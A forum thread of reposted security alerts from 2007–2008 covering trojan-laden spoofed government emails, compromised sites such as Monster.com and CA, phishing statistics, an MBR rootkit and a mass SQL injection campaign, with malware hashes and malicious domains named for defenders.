Old Alerts

Malicious Code: USDoJ (SPAM) Trojan Horse

FYI...

- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=822
November 19, 2007 - "Websense® Security Labs™ has discovered a new -email- attack variant similar to attacks previously launched on the IRS and Better Business Bureau. The spoofed email claims to be from the United States Department of Justice (USDOJ)... The message claims that a complaint to the USDOJ has been filed against the recipient's company. The email informs the reader that a copy of the original complaint has been attached to the email. The attached "complaint" is a Trojan Downloader .scr file with an MD5 of aeb784bc17c4c7e6edc5f1faaa9ed24f. None of the major anti-virus vendors detected the malicious code..."
(Screenshot available at the URL above.)

--------------------------------------------
More...
- http://blog.washingtonpost.com/securityfix/2007/11/a_fresh_round_of_targeted_emai.html
November 19, 2007; 10:30 PM ET - "Another series of sophisticated e-mail attacks were launched over the past 24 hours, addressing recipients by name and warning of complaints filed against them and/or their company with the Justice Department -and- the Better Business Bureau. E-mail security firm MessageLabs said it spotted the spike in targeted e-mail attacks designed to look as though they were sent from the Better Business Bureau. The messages address recipients by name and list corresponding employer information both in the body of the e-mail and the subject line. The missives reference an attached "complaint," which is actually a screensaver file that harbors password-stealing software..."

:fear:
 
Last edited:
Hackers jack Monster.com - infect job hunters

FYI...

- http://preview.tinyurl.com/39mtqc
November 20, 2007 (Computerworld) - "Monster.com took a portion of its Web site offline Monday as researchers reported that it had been compromised by an IFRAME attack and was being used to infect visitors with a multi-exploit attack kit. According to Internet records, the Russian Business Network (RBN) hacker network may be involved. Parts of the Monster Company Boulevard, which lets job hunters search for positions by company, were unavailable Monday; by evening, the entire section was dark. Most major American companies are represented on the site -- Google Inc.'s cache of the page that shows only those firms which begin with the letter "B", for example, included Banana Republic, Bank of America, Black & Decker, Boeing, Broadcom and Budget Car Rental. Job seekers who used Monster's by-company directory on Monday before the site was yanked were pounced on by Neosploit, an attack toolkit similar to the better-known Mpack, said Roger Thompson*, chief technology officer at Exploit Prevention Labs Inc... The injection of the malicious IFRAME code into the Monster.com site probably happened Monday, he added... "It is not clear how many pages were affected, but it is likely that the attack was the same for all companies on the site, which might turn out to be a pretty good set of the Fortune 500"... Monster.com last made security news in August, when the company admitted hackers had looted its database for weeks, perhaps months, then used that information to craft and send targeted e-mails that pitched money laundering jobs or tried to trick recipients into downloading malware. Monster.com was not available for comment Monday night."
* http://explabs.blogspot.com/2007/11/big-hack-today.html

:fear:
 
Malicious Code: Humanitarian support for flood victims email

FYI...

Malicious Code: Tabasco state/Banamex email lure banker trojan
- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=824
November 20, 2007 - "Websense® Security Labs™ has discovered -emails- that claim to solicit humanitarian support for flood victims in the state of Tabasco, Mexico. If users click an embedded link, they are prompted to download a banker Trojan horse, disguised as an HTML file. The file is displayed with the blue Internet Explorer icon. When a user opens the file, the Trojan horse modifies the hosts file to replace the legitimate Banamex with the IP address of a host controlled by the attacker. If users attempt to go to the Banamex site, they receive no visual indicators that they are not at a legitimate site. The phishing toolbars that were tested did not detect this fake site as a fraud. Neither the downloaded banker Trojan horse nor the subsequent executable that it drops (win32.exe) are detected as malicious by the 32 anti-virus products tested..."

(Screenshots available at the URL above.)

:fear:
 
Attention (online) Shoppers...

FYI...

- http://preview.tinyurl.com/39qspa
November 26, 2007 (Computerworld) - "...Safe-shopping tips. Here are a dozen to get you started:
* Shop with online merchants you know and trust.
* Order from secure Web sites, which can be identified by a locked padlock or unbroken key icon in your Web browser (unsecured sites may show an unlocked padlock or a broken key).
* Keep printouts of everything, including copies of your order; Web pages describing what you ordered; Web pages that tell the seller’s name, address and telephone number; and any e-mail confirmations you get. And make sure you add the date if it doesn’t automatically appear on the printouts.
* Use credit cards for online purchases, which will limit your loss to $50 if your credit is used without authorization. But it has to be a real credit card, not a debit or check card. You may want to use just one credit card for all online payments, to make it easier to detect wrongful charges.
* Don’t give out your Social Security number.
* Don’t give out unnecessary information.
* Don’t send your credit card number by e-mail.
* Don’t give out your passwords for e-commerce Web sites to anyone.
* Don’t give out your bank information; no one needs it for an online order.
* Double-check every Web site address.
* Don’t click on links within e-mails. Type in the Web site’s address yourself -- very carefully.
* Remember, if the deal seems too good to be true, it probably is.

You can also direct users to online sources of additional information, including the Better Business Bureau Web site ( www.bbbonline.org/OnlineShopTips ), the Privacy Rights Clearinghouse ( www.privacyrights.org/fs/fs23-shopping.htm ) and the Federal Trade Commission Web site ( www.ftc.gov/onlineshopping )..."

:spider:
 
Spammers shift to spreading malware

FYI...

The 2008 Internet Security Trends Report from IronPort Systems estimates that 98 per cent of all email traffic is now spam.
- http://www.ironport.com/securitytrends/
Dec 04, 2007 - "Spam volume increased 100 percent, to more than 120 billion spam messages daily worldwide. That's about 20 spam messages per day for every man, woman and child on the planet.
TRENDS OVERVIEW
The overall trends in spam and malware can be characterized by a larger number of more targeted, stealthy and sophisticated attacks. Specific observations include:
> Spam has become more dangerous.
...In 2007, more than 83 percent of spam contained a URL to a rogue Web server that was frequently serving malware. In accordance with a trend towards the blending of different malware techniques, URL-based viruses increased 256 percent.
> The "Self Defending Bot Network" was introduced...
> Viruses no longer make headlines..."
(Full report and links available at the URL above.)

------------------------------------------------

F-Secure - Malware Grew by 100% during 2007
As much malware produced in 2007 as in the previous 20 years altogether
- http://www.f-secure.com/f-secure/pressroom/news/fs_news_20071204_1_eng.html
Dec 4, 2007 - "In its 2007 data security summary, F-Secure reports of a steep increase in the amount of new malware detected during 2007. In fact the amount of cumulative malware detections doubled during the year, reaching the amount of half a million. This indicates that network criminals are producing new malware variants in bulk... The full 2007 Data Security Wrap-Up is available at http://www.f-secure.com/2007/2/ ... F-Secure predicts the increase in malware volume will continue in 2008. The criminals are successfully creating a network-based underground ecosystem, trading both malware development tools, skills, capabilities and resources ever more effectively. At the same time the reach of the law enforcement agencies remain limited in the global network domain..."

:sad:
 
Holiday e-card SPAM

FYI...

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=204700531
Dec. 4, 2007 - "...Message Labs said following Thanksgiving that it was seeing holiday-themed spam coming across its infrastructure at a rate of about 300,000 an hour. Symantec security researcher Jitender Sarda documented* one such attack on Tuesday that uses e-cards. "These e-cards are purportedly sent from a legitimate source and try to lure the victim to click on the link to view the e-cards, which have underlying tricks to try and infect the computer," said Sarda in a blog post. "With the Xmas bells starting to ring, here is the first incidence where Xmas e-cards have started doing the rounds." While these e-cards may appear to come from a familiar brand name, the "From:" field is forged. And the spammer responsible, perhaps aware that e-cards have acquired an air of disrepute, has even gone so far as to include the phrase "(no worm, no virus)" in the e-card's text, as if such an assurance made the message safe. In fact, the link provided attempts to download a file named "sos385.tmp" which is itself a downloader that connects to the Internet and attempts to download other malicious files."
* http://preview.tinyurl.com/2u5z7n
(Symantec Security Response Weblog)
---------------------------------------

More Christmas Card Action
- http://www.f-secure.com/weblog/archives/00001330.html
December 5, 2007 - "We've just seen another fake Christmas card malware run... The links are masked and point to a fake Yahoo Greeting card site. Do note the fake URL (abuse messages have been sent about the site)... The site prompts the user to download malicious
macromedia-flashplayerupdate.exe (md5: 506744BF870B5B0E410087BD6F3EFD37). We detect this file as an Agent variant. It collects various types of information from the infected machine and sends it back to the malware author via a website."

(Screenshots available at the F-secure URL above.)

:fear:
 
Last edited:
Malicious Code: Dept of Treasury Trojan Horse

FYI...

- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=830
December 13, 2007 - "Websense® Security Labs™ has discovered a new -email- attack that uses a spoofed email claiming to be from the United States Department of Treasury. This is similar to previous attacks claiming to originate from the IRS, Better Business Bureau, and Department of Justice. We have been tracking all of these attacks, and reporting them as they are discovered. The message claims that a complaint to the Department of Treasury has been filed against the recipient's company. The email informs the reader that a copy of the original complaint has been attached to the email. The attached "complaint" is a Trojan downloader with some backdoor capabilities. It is a ".pif" file with an MD5 of 9e19d23f27ebf9cfe1b9103066a3019e. It appears, however, that different versions of the Trojan are sent, based on the targeted recipient or company..."

(Screenshot available at the URL above.)

:fear:
 
HP Info Center Software laptop vuln - update available

FYI...

- http://www.us-cert.gov/current/#hp_hp_info_center_software
updated December 14, 2007 - "US-CERT is aware of a vulnerability affecting HP Info Center Software, which allows one-touch access to features on HP laptops. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands or to view or alter the system registry on affected systems. These reports also refer to publicly available exploit code for this vulnerability. HP has published an HP Quick Launch Buttons Critical Security Update* to address this issue. US-CERT encourages users to apply this update to mitigate this risk.
* ftp://ftp.hp.com/pub/softpaq/sp38001-38500/sp38166.html

- http://preview.tinyurl.com/2jhrxc
(HP Customer Care)
Release Date: 2007-12-12
Version: 1.00 A
Description:
This package provides a critical security update for HP Quick Launch Buttons on the supported notebook models and operating systems. This patch removes a security vulnerability by disabling HP Info Center...
» sp38166.exe 1/1 (1.61M)

:fear:
 
Rootkit infections up at Prevx test site

FYI...

- http://www.itbusiness.ca/it/client/en/home/news.asp?id=46368
12/14/2007 - "...Since 1 December 2007, 114,891 new users have run Prevx CSI with rootkit-detection features enabled. Of those PCs, 1,678 had what Prevx describes as 'significant rootkit infections'. That equates to 1.46% or approximately one in 70 systems, which is almost 15 times higher than the one in 1,000 rootkit-infected PCs previously estimated by industry experts. In the first nine days of this month alone, 93 companies used the free Business scan feature of Prevx CSI. Of these companies, 68 had one or more infected PCs. Thirteen companies, or 14%, had one or more PCs harboring rootkit infections.
These stats don't take into account the fact that users who scan their PCs are more likely to have concerns about infections..."

> http://info.prevx.com/downloadcsi.asp
"822,006 people have already checked their PC with Prevx CSI free, 182,018 were infected..."

:fear:
 
$3 Billion lost to phishing

FYI...

- http://www.gartner.com/it/page.jsp?id=565125
December 17, 2007 - "Phishing attacks in the United States soared in 2007 as $3.2 billion was lost to these attacks, according to a survey by Gartner, Inc. The survey found that 3.6 million adults lost money in phishing attacks in the 12 months ending in August 2007, as compared with the 2.3 million who did so the year before. According to a survey of more than 4,500 online U.S. adults in August 2007 (which was representative of the online U.S. adult population) the attacks were more successful in 2007 than they were in the previous two years. Of consumers who received phishing e-mails in 2007, 3.3 percent say they lost money because of the attack, compared with 2.3 percent who lost money in 2006, and 2.9 percent who did so in 2005...
The average dollar loss per incident declined to $886 from $1,244 lost on average in 2006 (with a median loss of $200 in 2007), but because there were more victims, $3.2 billion was lost to phishing in 2007, according to surveyed consumers. There was a bit of relative good news, however; the amounts that consumers were able to recover also increased. Some 1.6 million adults recovered about 64 percent of their losses in 2007, up from the 54 percent that 1.5 million adults recovered in 2006.
PayPal and eBay continue to be the most-spoofed brands, but phishing attacks increasingly employ devious social engineering attacks, impersonating, for example, electronic greeting cards, charities and foreign businesses.
Thieves are increasingly stealing debit card and other bank account credentials to rob accounts — targeting areas where fraud detection is weaker than it is with credit card accounts. According to the survey, of those consumers who lost money to phishing attacks, 47 percent said a debit or check card had been the payment method used when they lost money or had unauthorized charges made on their accounts. This was followed by 32 percent of respondents who listed a credit card as the payment method, and 24 percent who listed a bank account as the method (multiple responses were allowed)...
Phishing and malware attacks will continue to increase through 2009 because it's still a lucrative business for the perpetrators, and advertising networks will be used to deliver up to 30 percent of malware that lands on consumer desktops.
Gartner sees no easy way out of this dilemma unless e-mail providers have incentives to invest in solutions to keep phishing e-mails from reaching consumers in the first place, and unless advertising networks and other "infection point" providers (which theoretically can be any legitimate Web site or service) have incentives to keep malware from being planted on their Web sites to reach unsuspecting consumers..."

:fear::spider:
 
FYI...

McAfee false positive on some JavaScripts
- http://isc.sans.org/diary.html?storyid=3803
Last Updated: 2008-01-02 21:36:16 UTC - "Some users reported that their AV was detecting JS/Exploit-BO virus, on sites like ESPN and Friendster, for instance. The problem is with the McAfee AV. McAfee just released an Emergency DAT to fix the false on some JavaScripts, detecting as JS/Exploit-BO on virus database (DAT file) 5197 released today. The new DAT just released is 5198 and the url to download it is: http://www.mcafee.com/apps/downloads/security_updates/dat.asp "

(In the wake of "CA false positive for certain Javascript apps":
http://isc.sans.org/diary.html?storyid=3797 Last Updated: 2007-12-31 23:07:19 UTC)

:oops:
 
Facebook whacked...

FYI...

Phish (Face)book!
- http://www.f-secure.com/weblog/archives/00001353.html
January 3, 2008 - " We recently came across a phishing attack targeting Facebook. Phishers are apparently using hacked Facebook accounts to post links to a fake login page on other people's "Wall posts"... The phishing site is still currently online. Be wary of clicking on those links out there, even if they seem to (genuinely) come from your friends! Hat tip to Techcrunch*."
* http://www.techcrunch.com/2008/01/02/phishing-for-facebook

(Screenshots available at both URL's above.)
---------------------------------------------------
More... Zango adware on Facebook

- http://www.vnunet.com/vnunet/news/2206462/facebook-hit-adware-attack
3 Jan 2008 - "Facebook users are being warned about a new application on the social networking site that contains adware. 'Secret Crush' contains a download of the Zango adware program which automatically sends itself to five friends. It has already infected three per cent of Facebook users, over one million computers, according to security firm Fortinet*..."

Facebook Widget Installing Spyware
* http://www.fortiguardcenter.com/advisory/FGA-2007-16.html
2008.January.02

:fear::spider:
 
Last edited:
Malicious ads on Myspace, Excite, Blick

FYI...

- http://sunbeltblog.blogspot.com/2008/01/malicious-ads-on-myspace-excite-blick.html
January 03, 2008 - "We worked earlier today with Brain Krebs at the WP about malicious banner ads on Myspace. (Malware is being delivered through exploits, but fully patched systems won’t be affected.) Sandi Hardmeier has also been tracking ads at Excite and, now, Blick** (a popular German site). These are different than the Myspace ads (in that they don’t seem to be dumping an exploit-driven payload)."

* http://blog.washingtonpost.com/securityfix/2008/01/malwarelaced_banner_ads_at_mys.html

** http://msmvps.com/blogs/spywaresucks/archive/2008/01/04/1435836.aspx

:fear:
 
RealPlayer v11 0-day exploit released

FYI...

- http://www.us-cert.gov/current/#public_exploit_code_for_realplayer
January 2, 2008

- http://secunia.com/advisories/28276/
Release Date: 2008-01-03
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: RealPlayer 11.x
...Successful exploitation allows execution of arbitrary code. The vulnerability is reported in version 11 build 6.0.14.748. Other versions may also be affected.
Solution:
Do not open untrusted media files or browse untrusted websites...

- http://isc.sans.org/diary.html?storyid=3810
Last Updated: 2008-01-05 00:34:02 UTC ...(Version: 4)
"> Update 15:10 UTC: While you're at it, consider blocking access to uc8010-dot-com. If you do a Google Search for this domain, you'll understand why: Lots of injecting of a mailicious 0.js from this domain is currently going on, plenty of web sites seem to contain this booby trap. One of the IFRAMES fetched from this site, the file "r.htm" contains a RealPlayer exploit. Still the one from last month ( www.kb.cert.org/vuls/id/871673 ) but if they happen to re-tool to the new vulnerability, things might get ugly.
> Update 16:30 UTC: One of our readers noted that there are a number of state government and educational sites that appear to have been compromised with the uc8010 domain. Upon review, I see that some of these have already been cleaned up. However, the .gov and .edu sites are only a few of the many many sites that are turned up via google searches for the uc8010 domain. As that domain was only registered as of Dec 28th, compromises of websites probably occurred in the past week.
I recommend that our readers check to see if their site shows any references to uc8010 via google. Alternatively, look on their webservers to see if there are any unauthorized change to webpages in the past week.
> Update 00:30 UTC 5 JAN 08: Looks like there is another domain hosting a similar script. In addition to uc8010 check your flows for "ucmal.com"
----------------------------------------------------------

CA web site hacked
http://preview.tinyurl.com/2wdxkw
January 04, 2008 (Computerworld) - "Part of security software vendor CA's Web site was cracked earlier this week and was redirecting visitors to a malicious Web site hosted in China. Although the problem now appears to have been corrected, cached versions of some pages in the press section of CA.com show that earlier this week the site had been redirecting visitors to the uc8010.com domain, which has been serving malicious software since late December, according to Marcus Sachs, director of the SANS Internet Storm Center. The hack is similar to last year's attack on the Dolphin Stadium Web site, which infected visitors looking for information on the Super Bowl football game, Sachs said. "It's exactly the same setup," he said. "It's JavaScript that they've managed to insert into the title or the body of the HTML"..."

:fear:
 
Last edited:
Security vuln in Vista/XP - rootkit exploit in the wild

FYI...

- http://preview.tinyurl.com/2lgp5u
January 05, 2008 (Donna's SecurityFlash) -"In early Devember 2007 a new rootkit that hides itself in the Master Boot Record (MBR) of a users disk was spotted in the wild. Up until then this was more of a proof of concept (POC). This goes to show how much effort rootkit authors are putting in to creating new ways of evading Anti Rootkit software. This is a new vector of attack for malware writers and gives them control from outside the Operating System. This rootkit is using the MBR flaw. The MBR can be written to from within Windows.
The rootkit installs itself ( 244K ) on the last sectors of the users disk and then modifies other sectors including sector 0. The code is run before your PC boots up into XP, Vista or NT and has full control of the boot process which means it can install and run any application it wants without you, XP, Vista or NT knowing about it."

> http://www.antirootkit.com/blog/200...-in-vista-and-xp-rootkit-exploit-in-the-wild/

> http://www2.gmer.net/mbr/

:fear::spider:
 
Mass hack on 70k sites (!?)

FYI...

- http://preview.tinyurl.com/27hohx
January 07, 2008 (Computerworld) -- Tens of thousands of Web sites have been compromised by an automated SQL injection attack, and although some have been cleaned, others continue to serve visitors a malicious script that tries to hijack their PCs using multiple exploits, security experts said this weekend. Roger Thompson, the chief research officer of Grisoft SRO, pointed out that the hacked sites could be found via a simple Google search for the domain that hosted the malicious JavaScript. On Saturday, said Thompson, the number of sites that had fallen victim to the attack numbered more than 70,000. "This was a pretty good mass-hack," said Thompson, in a post to his blog*. "It wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared." Symantec Corp. cited reports by other researchers - including one identified only as "websmithrob" - that fingered an SQL vulnerability as the common thread..."
* http://explabs.blogspot.com/2008/01/so-this-is-kind-of-interesting.html
January 05, 2008 - "This domain uc8010(dot)com was registered just a few days ago (Dec 28th), and yet, at one point Google showed script injections pointing to it were showing up on over 70k domains... If you google for uc8010(dot)com, you still get about 50k hits..."

- http://isc.sans.org/diary.html?storyid=3810
Last Updated: 2008-01-05 20:13:55 UTC ...(Version: 5) - "Update 17:52: We have gotten reports of embeded script links to ucmal on MySpace. It is probably safe to assume that other social networking sites have it as well."

:fear::fear::devilpoin:
 
SQL injection attack...

More...

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=205600157
Jan. 8, 2008 - "Web sites that naively call for user input, then fail to put strict checks on what that input may be, are susceptible to SQL injection attacks. That vulnerability appears to be the cause of up to 70,000 Web pages getting hacked by malicious code between Dec. 28 and Jan. 5. The intrusions represent a whole new level of threat to users on the Internet. Instead of the attack seeking to launch a virus or worm at individual computers, it invaded Web databases and used them to host its malicious code and distribute it every time site visitors sought information beyond a home page or product page from the database. But for the fact it used an old and already guarded against Windows exploit, it might still be spreading across the Internet... it was Microsoft SQL Server databases that ended up as the target of the attack because the tables targeted are specific to SQL Server... The intrusion of each database is massive, with a JavaScript string being attached to all text items in the database. A site user's request for an information item then leads to the attacker's JavaScript response attempting to plant code on the user's computer. The attack typically invades a site with a catalogue or other large text files stored on a SQL Server database. As a site visitor clicks on a Web site's button or link for more information, such as "more information" from a catalogue, the database is activated to send a JavaScript plant onto the user's computer... The plants take advantage of a widely publicized Windows vulnerability, listed as the MS06-014* exploit... Google and Yahoo's cached pages from Web site databases may still contain the JavaScript, untouched by site efforts to clean it up, the experts warned."
* http://support.microsoft.com/kb/911562/en-us
Last Review: March 27, 2007
Revision: 3.6

:fear:
 
Malicious Code: NPRC e-mail (SPAM) loaded with trojan horse

FYI...

- http://www.websense.com/securitylabs/alerts/alert.php?AlertID=835
January 08, 2008 - "Websense® Security Labs™ has discovered a new email attack that uses a spoofed email message which claims to be from the National Payroll Reporting Consortium (NPRC). This attack is similar to previous attacks claiming to originate from the IRS, Better Business Bureau, and Department of Justice. We have tracked all of these attacks, and reported them as they were discovered. The message claims that the recipient's company has made numerous misrepresentations regarding worker classification,in an attempt to lower compensation costs. The email asks the recipient to fill out an attached form and fax it to NPRC's fraud department in order to resolve the issue. An email attachment contains a Trojan downloader with some backdoor capabilities. It is a malicious Windows executable file, with an MD5 of 854e259c7c0ac6fb2a26963a9d77600d ... At time of writing, only one anti-virus vendor had detected this malicious code."

(Screenshot available at the URL above.)

:fear:
 
Mexico: DNS poisoning via DSL modems

FYI...

- http://blog.trendmicro.com/targeted-attack-in-mexico-dns-poisoning-via-modems/
January 11, 2008 - "...TrendLabs researchers have received reports of what appears to be an attempt of a massive DNS poisoning attack in Mexico... the attack begins with the exploitation of a known vulnerability in 2Wire modems*. The said vulnerability allows an attacker to modify the local DNS servers and hosts. One of the main Internet Service Providers in Mexico offers 2Wire modems to their customers, and it is estimated that more than 2 million users are at risk... exploit arrives with a newsy email message... once an unsupecting user opens the email in its full HTML format, the exploit code automatically attempts to access the modem’s Web console and modify the local host database to redirect all requests for banamex.com — the Web site of one of the largest banks in Mexico — to a fraudulent site... The malicious email message also promises a “video” and includes a link that points to the a malicious URL where the .RAR acrhive Video_Narco.rar can be downloaded. This archive contains the malicious file Video_Narco.exe..."
* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4389

:fear:
 
Obfuscated Java.ByteVerify exploit - web sites in China

FYI...

- http://isc.sans.org/diary.html?storyid=3826
Last Updated: 2008-01-11 20:19:06 UTC - "Come April, we will reach the FIFTH anniversary of the ByteVerify vulnerability (MS03-011). Untangling some seriously obfuscated JavaScript coming from a couple of web sites in China earlier today, I ended up with - yes, a ByteVerify exploit. Also in the package was an MDAC exploit (MS06-014), whose second anniversary will be up this April as well.
> To see these exploits still in use can only mean one thing: They still work.
And they seem to work well enough that the bad guys can instead sink their time into developing new obfuscation techniques and other ways to make analysis more difficult -- only to deliver a five year old exploit in the end. Not a very stellar testament to patching efforts."

:fear:
 
You must log in or register to reply here.
Back
Top